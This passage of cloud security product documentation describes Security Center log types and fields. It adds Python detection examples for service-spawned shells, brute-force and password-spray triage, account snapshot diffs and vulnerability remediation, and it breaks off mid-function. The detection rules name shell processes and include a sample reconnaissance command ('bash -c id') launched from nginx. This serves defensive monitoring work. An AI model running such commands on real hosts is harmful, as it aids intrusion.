View Security Center logs to quickly identify and respond to security events. After purchasing log storage, Security Center automatically collects security logs, which record security events, and host logs, which track host activities. This topic describes the supported log types and their fields.
Supported log types
Log types supported by different editions
Different editions of Security Center support different security capabilities, so the set of available log types varies by edition. The following table lists the log types supported by each edition.
Editions | Supported log types |
Anti-virus, Advanced, Enterprise, and Ultimate | |
Basic | |
Log types supported for value-added features
When using the following value-added features, you do not need to purchase a paid edition of Security Center. You only need to activate the corresponding value-added feature. Once you activate these features and enable the Security Center log analysis feature, Security Center will support recording the following log types:
Malicious file detection logs
Agentless detection logs
Application protection logs
CSPM-baseline check logs
CSPM-cloud service configuration check logs
Log categories
Host logs
Log type | __topic__ | Description | Collection cycle |
aegis-log-login | Records logs of user logins to servers, including login time, login user, login method, login IP address, and other information. Logon logs help you monitor user activities, promptly identify and respond to abnormal behaviors, thereby ensuring system security. Note Security Center does not support recording logon logs for Windows Server 2008 operating systems. | Real-time collection. | |
aegis-log-network | Records logs of network connection activities, including server connection 5-tuple, connection time, connection status, and other information. Network connection logs help you discover abnormal connection behaviors, identify potential network attacks, optimize network performance, etc. Note | Real-time collection. | |
aegis-log-process | Records logs related to process startup on the server, including process startup time, startup command, and parameters. By recording and analyzing process startup logs, you can understand the startup status and configuration information of processes in the system, detect abnormal process activities, malware intrusions, security threats, and other issues. | Real-time collection, process startup is reported immediately. | |
aegis-log-crack | Records logs of brute-force attack behaviors, including attempts to log in and crack systems, applications, or accounts. By recording and analyzing brute-force attack logs, you can understand the brute-force attacks on systems or applications, detect abnormal login attempts, weak passwords, and credential leaks. Brute-force attack logs can also be used to track malicious users and conduct forensic analysis, assisting security teams in incident response and investigation. | Real-time collection. | |
aegis-snapshot-host | Records logs of detailed user account information in systems or applications, including basic account attributes such as username, password policy, login history, etc. By comparing account snapshot logs at different time points, you can understand the changes and evolution of user accounts and promptly detect potential account security issues, such as unauthorized account access, abnormal account status, etc. | | |
aegis-snapshot-port | Records logs of network connections, including 5-tuple, connection status, and associated process information fields. By recording and analyzing network connection snapshot logs, you can understand the active network sockets in the system, helping you discover abnormal connection behaviors, identify potential network attacks, optimize network performance, etc. | ||
aegis-snapshot-process | Records logs of process activities in the system, including process ID, process name, process startup time, and other information. By recording and analyzing process snapshot logs, you can understand the activity status and resource usage of processes in the system, detect abnormal processes, CPU usage, memory leaks, and other issues. | ||
aegis-log-dns-query | Records logs of DNS query requests, including detailed information about DNS query requests sent by the server, such as the queried domain name, query type, query source, and other information. By analyzing DNS request logs, you can understand DNS query activities in the network, detect abnormal query behaviors, domain hijacking, DNS poisoning, and other issues. Note For Linux servers with kernel versions lower than the 4.X.X series, Security Center does not support DNS request log collection and malicious DNS behavior detection. It is recommended that you consider upgrading the system kernel to a higher version to obtain comprehensive threat detection capabilities. | Real-time collection. | |
aegis-log-client | Records the online and offline events of Security Center agents. | Real-time collection. |
Security log types
Log type | __topic__ | Description | Collection cycle |
sas-vul-log | Records logs of vulnerability-related information found in systems or applications, including vulnerability name, vulnerability status, handling actions, and other information. By recording and analyzing vulnerability logs, you can understand the vulnerabilities in the system, security risks, and attack trends, and take appropriate remedial measures in a timely manner. | Real-time collection. | |
sas-hc-log | Records logs of baseline risk check results, including baseline level, baseline category, risk level, and other information. By recording and analyzing baseline risk logs, you can understand the baseline security status and potential risks of the system. Note Only check items that fail for the first time, and check items that previously passed but fail on re-check, are recorded. | ||
sas-security-log | Records logs of security events and alert information that occur in systems or applications, including alert data source, alert details, alert level, and other information. By recording and analyzing security alert logs, you can understand the security events and threats in the system and take appropriate response measures in a timely manner. | ||
sas-cspm-log | Records logs related to cloud security posture management, including check results, whitelist operations, and other information from cloud security posture management. By recording and analyzing cloud security posture management logs, you can understand the configuration issues and potential security risks in the cloud platform. | ||
sas-net-block | Records logs of network attack events, including attack type, source IP address, target IP address, and other key information. By recording and analyzing network defense logs, you can understand the security events occurring in the network, and then take appropriate response and defense measures to improve the security and reliability of the network. | ||
sas-rasp-log | Records logs of attack alert information from the application protection feature, including attack type, behavioral data, attacker IP, and other key information. By recording and analyzing application protection alert logs, you can understand the security events occurring in the application, and then take appropriate response and defense measures to improve the security and reliability of the application. | ||
sas-filedetect-log | Records logs of malicious file detection using the malicious file detection SDK feature, including file information, detection scenario, detection results, and other information for malicious file detection. By recording and analyzing malicious file detection logs, you can identify common viruses in offline files and Alibaba Cloud OSS files, such as ransomware, mining programs, etc., and handle them promptly to prevent the spread and execution of malicious files. | ||
aegis-file-protect-log | Records alert events detected using the core file monitoring feature, including file path, operations performed on the file, alert level, and other information. By recording and analyzing core file monitoring event logs, you can monitor whether core files are stolen or tampered with. | ||
sas-agentless-log | Records security risks detected in Elastic Compute Service (ECS) instances and images by the agentless detection feature, including vulnerabilities, baselines, malicious samples, and sensitive files. By recording and analyzing agentless detection logs, you can view the security risks in assets during different time periods, helping you identify and address potential threats. |
Network logs (no longer supported for delivery)
Starting March 27, 2025, the log analysis feature no longer supports the delivery of network logs, including web access logs, DNS logs, network session logs, and local DNS logs. For alternative solutions for network logs, see Alternative solutions for adding or delivering network logs.
If you have activated network log delivery, this service will end on March 27, 2025, and new network log data will no longer be delivered. The query function for network logs on the Log Analysis page in the Security Center console will be discontinued.
To query delivered network logs, you can click Advanced Management of Simple Log Service in the upper right corner of the Log Analysis page to go to the Simple Log Service console, and refer to the log field descriptions in the appendix to view the delivered network logs.
Log type | __topic__ | Description | Collection cycle |
sas-log-http | Logs of user requests to web servers and responses from the web servers, including the IP address of the user, request time, request method, request URL, HTTP status code, and response size. Web access logs are used to analyze web traffic and user behavior, identify access patterns and exceptions, and optimize website performance. | In most cases, logs are collected 1 to 12 hours after the logs are generated. | |
sas-log-dns | Logs of DNS resolution details, including the requested domain name, query type, IP address of the client, and response value. You can monitor the request and response process of DNS resolution, and identify abnormal resolution behavior, DNS hijacking, and DNS poisoning based on DNS logs. | ||
sas-log-session | Logs of network connections and data transmission, including the details of network sessions. The details include the session start time, source IP address, destination IP address, protocol, and ports. Network session logs are generally used to monitor network traffic, identify potential threats, and optimize network performance. | ||
local-dns | Logs of DNS queries and responses on the local DNS server, including the requested domain name, query type, IP address of the client, and response value. You can obtain the information about DNS queries in your network, and identify issues such as abnormal query behavior, domain hijacking, and DNS poisoning based on internal DNS logs. |
Host log fields
Logon logs
Field name | Description | Example |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
src_ip | The IP address that is used to log on to the server. | 221.11.XX.XX |
dst_port | The port that is used to log on to the server. | 22 |
login_type | The logon type. Valid values: | SSH |
username | The username that is used for logon. | admin |
login_count | The number of logon attempts. The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the | 3 |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Network connection logs
Field name | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. You can use an index to search for a process chain. | B184 |
container_hostname | The name of the server in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The name of the container. | nginx-ingress-**** |
container_pid | The ID of the process in the container. | 0 |
net_connect_dir | The direction of the network connection. Valid values: | in |
dst_ip | The destination IP address. | 192.168.XX.XX |
dst_port | The destination port. | 443 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
parent_proc_name | The name of the parent process file. | /usr/bin/bash |
pid | The ID of the process. | 14275 |
ppid | The parent process ID. | 14268 |
proc_name | The name of the process. | nginx |
proc_path | The path to the process. | /usr/local/nginx/sbin/nginx |
proc_start_time | The time when the process was started. | N/A |
connection_type | The protocol. Valid values: | tcp |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
src_ip | The source IP address. | 100.127.XX.XX |
src_port | The source port. | 41897 |
srv_comm | The command name of the grandparent process (the parent of the parent process). | containerd-shim |
status | The status of the network connection. Valid values: | 5 |
type | The type of the real-time network connection. Valid values: | listen |
uid | The ID of the user who started the process. | 101 |
username | The name of the user who started the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Process startup logs
Field name | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. You can use an index to search for a process chain. | B184 |
cmd_index | The index of a parameter in the command line. Every two indexes are grouped to identify the start of a parameter and the end of the parameter. | 0,3,5,8 |
cmdline | The complete command to start the process. | ipset list KUBE-6-CLUSTER-IP |
comm | The command name related to the process. | N/A |
container_hostname | The name of the server in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The name of the container. | nginx-ingress-**** |
container_pid | The ID of the process in the container. | 0 |
cwd | The current working directory (CWD) of the process. | N/A |
proc_name | The name of the process file. | ipset |
proc_path | The full path to the process file. | /usr/sbin/ipset |
gid | The ID of the process group. | 0 |
groupname | The name of the user group. | group1 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
parent_cmd_line | The command line of the parent process. | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
parent_proc_name | The name of the parent process file. | kube-proxy |
parent_proc_path | The full path to the parent process file. | /usr/local/bin/kube-proxy |
pid | The ID of the process. | 14275 |
ppid | The parent process ID. | 14268 |
proc_start_time | The time when the process started. | 2024-08-01 16:45:40 |
parent_proc_start_time | The time when the parent process was started. | 2024-07-12 19:45:19 |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
srv_cmd | The command line of the ancestor process. | /usr/bin/containerd |
tty | The terminal that is logged on to. The value N/A indicates that the account has not been used for terminal logons. | N/A |
uid | The user ID. | 123 |
username | The name of the user who started the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
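The process startup log carries both the immediate parent (parent_proc_name) and the full ancestry (cmd_chain), which is what a detection rule needs to tell a routine child process from a service that unexpectedly launched a shell. The following is an added example written for this page, not code from Security Center; it assumes that cmd_chain is a JSON list of one-key {pid: cmdline} objects ordered from the oldest ancestor to the process itself, as in the page's example row, and the shell and service process name sets are assumptions to be tuned per environment.

```python
"""Review aegis-log-process records for a service process that spawned a shell.

Added example; field names follow this page's process startup log table. The
cmd_chain layout (a JSON list of {pid: cmdline} objects, oldest ancestor first)
mirrors the page's example row; the process-name sets below are assumptions."""
import json

SHELLS = {"bash", "sh", "dash", "zsh"}                              # assumption
SERVICE_PARENTS = {"nginx", "httpd", "java", "php-fpm", "tomcat"}   # assumption

# Constructed sample records (not captured from a real host).
SAMPLE_RECORDS = [
    {   # benign: kube-proxy refreshing an ipset, modelled on the page's example row
        "pid": 14275, "ppid": 14268, "proc_name": "ipset", "proc_path": "/usr/sbin/ipset",
        "cmdline": "ipset list KUBE-6-CLUSTER-IP", "parent_proc_name": "kube-proxy",
        "username": "root", "container_name": "N/A",
        "cmd_chain": json.dumps([
            {"1": "/usr/lib/systemd/systemd"},
            {"14268": "/usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf"},
            {"14275": "ipset list KUBE-6-CLUSTER-IP"},
        ]),
    },
    {   # suspicious: a web server worker inside a container launching a shell
        "pid": 9911, "ppid": 9883, "proc_name": "bash", "proc_path": "/usr/bin/bash",
        "cmdline": "bash -c id", "parent_proc_name": "nginx",
        "username": "www-data", "container_name": "nginx-ingress-****",
        "cmd_chain": json.dumps([
            {"1": "/usr/bin/containerd"},
            {"9883": "nginx: worker process"},
            {"9911": "bash -c id"},
        ]),
    },
]


def parse_cmd_chain(raw):
    """Turn the cmd_chain JSON into an ordered list of (pid, cmdline) tuples."""
    chain = []
    for entry in json.loads(raw):
        for pid, cmdline in entry.items():
            chain.append((int(pid), cmdline))
    return chain


def ancestor_names(chain):
    """Command name (basename of argv[0]) for each chain entry; strips the
    trailing colon nginx puts in its process titles ("nginx: worker process")."""
    names = []
    for _, cmdline in chain:
        if cmdline.strip():
            names.append(cmdline.split()[0].rsplit("/", 1)[-1].rstrip(":"))
    return names


def flag_service_spawned_shell(record):
    """Return a finding when a shell's parent or any ancestor is a service process."""
    if record["proc_name"] not in SHELLS:
        return None
    chain = parse_cmd_chain(record["cmd_chain"])
    ancestors = set(ancestor_names(chain[:-1]))        # everything above the shell itself
    ancestors.add(record["parent_proc_name"])
    hit = ancestors & SERVICE_PARENTS
    if not hit:
        return None
    return {
        "pid": record["pid"], "shell": record["proc_name"], "cmdline": record["cmdline"],
        "spawned_by": sorted(hit), "container": record["container_name"],
        "user": record["username"],
    }


def scan(records):
    """Run the rule over a batch of process startup records."""
    return [f for f in (flag_service_spawned_shell(r) for r in records) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(finding)
```

The rule deliberately walks the whole chain rather than only parent_proc_name, because an intermediate `sh -c` wrapper between the service and the final shell would otherwise hide the relationship.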
Brute-force attack logs
Field name | Description | Example |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server that is under a brute-force attack. | 192.168.XX.XX |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
uuid | The UUID of the server that is under a brute-force attack. | 5d83b26b-b7ca-4a0a-9267-12***** |
login_count | The number of failed logon attempts. The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the | 3 |
src_ip | The source IP address. | 47.92.XX.XX |
dst_port | The logon port. | 22 |
login_type | The logon type. Valid values: | SSH |
username | The username that is used for logon. | user |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
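Because Security Center folds repeated attempts within one minute into a single record and reports the count in login_count, a detection over the brute-force attack logs (and the logon logs above, which share the same fields) should sum login_count per source rather than count records. The following is an added example, not code from Security Center: it groups aegis-log-crack records by src_ip inside a fixed time window and separates a single-account brute force from password spraying (one source, many usernames). The window and thresholds are assumptions, and the records are constructed with documentation IP ranges.

```python
"""Triage aegis-log-crack records by source IP within a time window.

Added example; fields follow this page's brute-force attack log table
(src_ip, username, dst_port, login_type, login_count, start_time in seconds).
Window size and thresholds are assumptions, not Security Center settings."""
from collections import defaultdict

WINDOW_SECONDS = 600        # assumption: evaluate each source per 10-minute window
ATTEMPT_THRESHOLD = 20      # assumption: summed failed attempts that warrant an alert
SPRAY_USER_THRESHOLD = 5    # assumption: distinct usernames that indicate spraying

# Constructed sample records (not real log data).
SAMPLE_RECORDS = [
    {"src_ip": "198.51.100.7", "username": "root",  "dst_port": 22, "login_type": "SSH", "login_count": 12, "start_time": 1719472214},
    {"src_ip": "198.51.100.7", "username": "root",  "dst_port": 22, "login_type": "SSH", "login_count": 9,  "start_time": 1719472280},
    {"src_ip": "198.51.100.7", "username": "admin", "dst_port": 22, "login_type": "SSH", "login_count": 3,  "start_time": 1719472300},
    {"src_ip": "203.0.113.9",  "username": "alice", "dst_port": 22, "login_type": "SSH", "login_count": 1,  "start_time": 1719472400},
    {"src_ip": "203.0.113.9",  "username": "bob",   "dst_port": 22, "login_type": "SSH", "login_count": 1,  "start_time": 1719472410},
    {"src_ip": "203.0.113.9",  "username": "carol", "dst_port": 22, "login_type": "SSH", "login_count": 1,  "start_time": 1719472420},
    {"src_ip": "203.0.113.9",  "username": "dave",  "dst_port": 22, "login_type": "SSH", "login_count": 1,  "start_time": 1719472430},
    {"src_ip": "203.0.113.9",  "username": "erin",  "dst_port": 22, "login_type": "SSH", "login_count": 2,  "start_time": 1719472440},
    {"src_ip": "192.0.2.55",   "username": "ops",   "dst_port": 22, "login_type": "SSH", "login_count": 2,  "start_time": 1719472500},
]


def summarize_by_source(records, window_seconds=WINDOW_SECONDS):
    """Bucket records by (src_ip, window start) and aggregate attempts, users and services."""
    buckets = defaultdict(lambda: {"attempts": 0, "usernames": set(), "services": set()})
    for rec in records:
        window_start = rec["start_time"] - rec["start_time"] % window_seconds
        bucket = buckets[(rec["src_ip"], window_start)]
        bucket["attempts"] += int(rec["login_count"])   # login_count already folds 1-minute repeats
        bucket["usernames"].add(rec["username"])
        bucket["services"].add(f'{rec["login_type"]}/{rec["dst_port"]}')
    return buckets


def classify(records, window_seconds=WINDOW_SECONDS,
             attempt_threshold=ATTEMPT_THRESHOLD, spray_users=SPRAY_USER_THRESHOLD):
    """Label each (source, window) as password_spray or brute_force; drop the rest."""
    findings = []
    for (src_ip, window_start), b in summarize_by_source(records, window_seconds).items():
        if len(b["usernames"]) >= spray_users:
            kind = "password_spray"          # few attempts each across many accounts
        elif b["attempts"] >= attempt_threshold:
            kind = "brute_force"             # many attempts against one or two accounts
        else:
            continue
        findings.append({
            "src_ip": src_ip, "window_start": window_start, "kind": kind,
            "attempts": b["attempts"], "usernames": sorted(b["usernames"]),
            "services": sorted(b["services"]),
        })
    return sorted(findings, key=lambda f: (f["window_start"], f["src_ip"]))


if __name__ == "__main__":
    for finding in classify(SAMPLE_RECORDS):
        print(finding)
```

The spray check runs first on purpose: a spray that also crosses the attempt threshold is still better described by the number of distinct accounts it touched, which is what an analyst needs to scope a password reset.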
Account snapshot logs
Field name | Description | Example |
account_expire | The date when the account expires. The value never indicates that the account never expires. | never |
domain | The domain or directory to which the account belongs. The value N/A indicates that the account does not belong to a domain. | N/A |
groups | The group to which the account belongs. The value N/A indicates that the account does not belong to a group. | ["nscd"] |
home_dir | The home directory, which is the default directory to store and manage files in the system. | /Users/abc |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
last_chg | The date when the password was last changed. | 2022-11-29 |
last_logon | The date and time of the last logon that is initiated by using the account. The value N/A indicates that the account has not been used for logons. | 2023-08-18 09:21:21 |
login_ip | The IP address from which the last remote logon was initiated by using the account. The value N/A indicates that the account has not been used for logons. | 192.168.XX.XX |
passwd_expire | The date when the password expires. The value never indicates that the password never expires. | 2024-08-24 |
perm | Indicates whether the account has root permissions. Valid values: | 0 |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
shell | The Linux shell command. | /sbin/nologin |
status | The status of the account. Valid values: | 0 |
tty | The terminal that is logged on to. The value N/A indicates that the account has not been used for terminal logons. | N/A |
username | The name of the user. | nscd |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_time | The date when you are notified of expiring passwords. The value never indicates that no notifications are sent. | 2024-08-20 |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
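The log category table above points out that account snapshot logs are most useful when snapshots from two points in time are compared. The following is an added example, not code from Security Center: it diffs two aegis-snapshot-host collections keyed by username, reports added, removed and changed accounts (shell, groups, password and account expiry, home directory), and then reviews the newer snapshot for interactive accounts in a privileged group whose password never expires. The privileged group names, the no-login shell list and the sample accounts are assumptions; groups is parsed from the JSON array form shown in the table.

```python
"""Diff two aegis-snapshot-host collections and review the newer one.

Added example; fields follow this page's account snapshot log table. The
privileged group names, no-login shells and sample accounts are assumptions."""
import json

TRACKED_FIELDS = ("shell", "groups", "perm", "passwd_expire", "account_expire", "home_dir")
PRIVILEGED_GROUPS = {"wheel", "sudo", "root"}                             # assumption
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}    # assumption


def _acct(username, shell, groups, perm=0, passwd_expire="never", account_expire="never",
          last_logon="N/A", login_ip="N/A", start_time=1719472214):
    """Build a constructed snapshot record with the page's field names."""
    return {
        "username": username, "shell": shell, "groups": json.dumps(groups), "perm": perm,
        "passwd_expire": passwd_expire, "account_expire": account_expire,
        "home_dir": "/" if shell in NOLOGIN_SHELLS else f"/home/{username}",
        "last_logon": last_logon, "login_ip": login_ip, "start_time": start_time,
        "uuid": "5d83b26b-b7ca-4a0a-9267-12****", "sas_group_name": "default",
    }


# Constructed snapshots (not real data): the earlier one and one taken a day later.
EARLIER = [
    _acct("nscd", "/sbin/nologin", ["nscd"]),
    _acct("alice", "/bin/bash", ["alice"], passwd_expire="2024-08-24",
          last_logon="2023-08-18 09:21:21", login_ip="192.168.XX.XX"),
]
LATER = [
    _acct("nscd", "/sbin/nologin", ["nscd"], start_time=1719558614),
    _acct("alice", "/bin/bash", ["alice", "wheel"], passwd_expire="2024-08-24",
          last_logon="2023-08-18 09:21:21", login_ip="192.168.XX.XX", start_time=1719558614),
    _acct("svc-backup", "/bin/bash", ["wheel"], start_time=1719558614),
]


def _normalize(record):
    """Copy a record and turn the JSON groups string into a sorted list for comparison."""
    rec = dict(record)
    raw = rec.get("groups", "N/A")
    rec["groups"] = [] if raw == "N/A" else sorted(json.loads(raw))
    return rec


def diff_snapshots(earlier, later):
    """Report accounts that appeared, vanished, or changed a tracked field."""
    before = {r["username"]: _normalize(r) for r in earlier}
    after = {r["username"]: _normalize(r) for r in later}
    changed = {}
    for user in before.keys() & after.keys():
        delta = {f: (before[user][f], after[user][f])
                 for f in TRACKED_FIELDS if before[user][f] != after[user][f]}
        if delta:
            changed[user] = delta
    return {
        "added": sorted(after.keys() - before.keys()),
        "removed": sorted(before.keys() - after.keys()),
        "changed": changed,
    }


def review(snapshot):
    """Flag interactive accounts in a privileged group whose password never expires."""
    flagged = []
    for rec in map(_normalize, snapshot):
        if rec["shell"] in NOLOGIN_SHELLS:
            continue
        privileged = set(rec["groups"]) & PRIVILEGED_GROUPS
        if privileged and rec["passwd_expire"] == "never":
            flagged.append({"username": rec["username"], "groups": sorted(privileged),
                            "last_logon": rec["last_logon"]})
    return flagged


if __name__ == "__main__":
    print(diff_snapshots(EARLIER, LATER))
    print(review(LATER))
```

Diffing on normalized groups matters because the agent may serialize the same membership in a different order between snapshots; comparing the raw JSON strings would report spurious changes.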
Network snapshot logs
Field name | Description | Example |
net_connect_dir | The direction of the network connection. Valid values: | in |
dst_ip | The destination IP address. | 192.168.XX.XX |
dst_port | The destination port. | 443 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
pid | The ID of the process. | 682 |
proc_name | The name of the process. | sshd |
connection_type | The protocol. Valid values: | tcp4 |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
src_ip | The source IP address. | 100.127.XX.XX |
src_port | The source port. | 41897 |
status | The status of the network connection. Valid values: | 5 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Process snapshot logs
Field name | Description | Example |
cmdline | The complete command to start the process. | /usr/local/share/assist-daemon/assist_daemon |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
md5 | The MD5 hash value of the binary file. Note The MD5 algorithm is not supported for files that exceed 1 MB in size. | 1086e731640751c9802c19a7f53a64f5 |
proc_name | The name of the process file. | assist_daemon |
proc_path | The full path to the process file. | /usr/local/share/assist-daemon/assist_daemon |
pid | The ID of the process. | 1692 |
pname | The name of the parent process file. | systemd |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
proc_start_time | The time when the process started. This is a built-in field. | 2023-08-18 20:00:12 |
uid | The ID of the user who started the process. | 101 |
username | The name of the user who started the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
DNS request logs
Field name | Description | Example |
domain | The domain name that is included in the DNS request. | example.aliyundoc.com |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server that initiates the DNS request. | 192.168.XX.XX |
pid | The ID of the process that initiates the DNS request. | 3544 |
ppid | The ID of the parent process that initiates the DNS request. | 3408 |
cmd_chain | The chain of the process that initiates the DNS request. | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
cmdline | The command line of the process that initiates the DNS request. | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | The path to the process that initiates the DNS request. | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
time | The time when the DNS request is captured. In most cases, the value is the point in time when the DNS request is initiated. | 2023-08-17 20:05:04 |
uuid | The UUID of the server that initiates the DNS request. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Agent event logs
Field name | Description | Example |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
agent_version | The version of the Security Center agent. | aegis_11_91 |
last_login | The timestamp of the last logon. Unit: milliseconds. | 1716444387617 |
platform | The type of the operating system. Valid values: | linux |
region_id | The ID of the region in which the server resides. | cn-beijing |
status | The status of the Security Center agent. Valid values: | online |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Security log fields
Vulnerability logs
Field name | Description | Example |
vul_alias_name | The alias of the vulnerability. | CESA-2023:1335: openssl Security Update |
risk_level | The risk level. Valid values: | later |
extend_content | The extended information about the vulnerability. | {"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]} |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the host. | 39.104.XX.XX |
intranet_ip | The private IP address of the host. | 192.168.XX.XX |
instance_name | The name of the host. | hhht-linux-*** |
vul_name | The name of the vulnerability. | centos:7:cesa-2023:1335 |
operation | The operation on the vulnerability. Valid values: | new |
status | The status information. Valid values: | 1 |
tag | The tag that is added to the vulnerability. Valid values: | oval |
type | The type of the vulnerability. Valid values: | sys |
uuid | The UUID of the server. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
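Most of what an operator acts on in a vulnerability log sits inside extend_content: the CVE list, the installed package versions, and the update command per package. The following is an added example, not code from Security Center, that parses the extend_content value shown in the table above into a remediation plan, keeping only the rpmEntityList entries whose result is true (the ones that actually matched). The record wrapper around it is constructed from the table's example values; the key names are the ones visible in the example JSON and nothing else is assumed about the schema.

```python
"""Turn a sas-vul-log record's extend_content into a remediation plan.

Added example; the extend_content string is the example value from this page's
vulnerability log table, and the surrounding record fields are constructed
from the same table. Key names come from that JSON; no other schema is assumed."""
import json

EXAMPLE_EXTEND_CONTENT = (
    '{"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,'
    '"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},'
    '"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":['
    '{"fullVersion":"1.0.2k-25.el7_9","kernel":false,'
    '"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9",'
    '"matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs",'
    '"nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs",'
    '"version":"1.0.2k-25.el7_9"},'
    '{"fullVersion":"1.0.2k-25.el7_9","kernel":false,'
    '"matchDetail":"openssl version less than 1.0.2k-26.el7_9",'
    '"matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl",'
    '"nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl",'
    '"version":"1.0.2k-25.el7_9"}]}'
)

# Constructed record shell around the page's example extend_content.
SAMPLE_RECORD = {
    "vul_alias_name": "CESA-2023:1335: openssl Security Update",
    "vul_name": "centos:7:cesa-2023:1335",
    "risk_level": "later", "operation": "new", "status": 1, "tag": "oval", "type": "sys",
    "instance_id": "i-2zeg4zldn8zypsfg****", "instance_name": "hhht-linux-***",
    "intranet_ip": "192.168.XX.XX", "uuid": "ad66133a-dc82-4e5e-9659-a49e3****",
    "extend_content": EXAMPLE_EXTEND_CONTENT, "start_time": 1719472214,
}


def remediation_plan(record):
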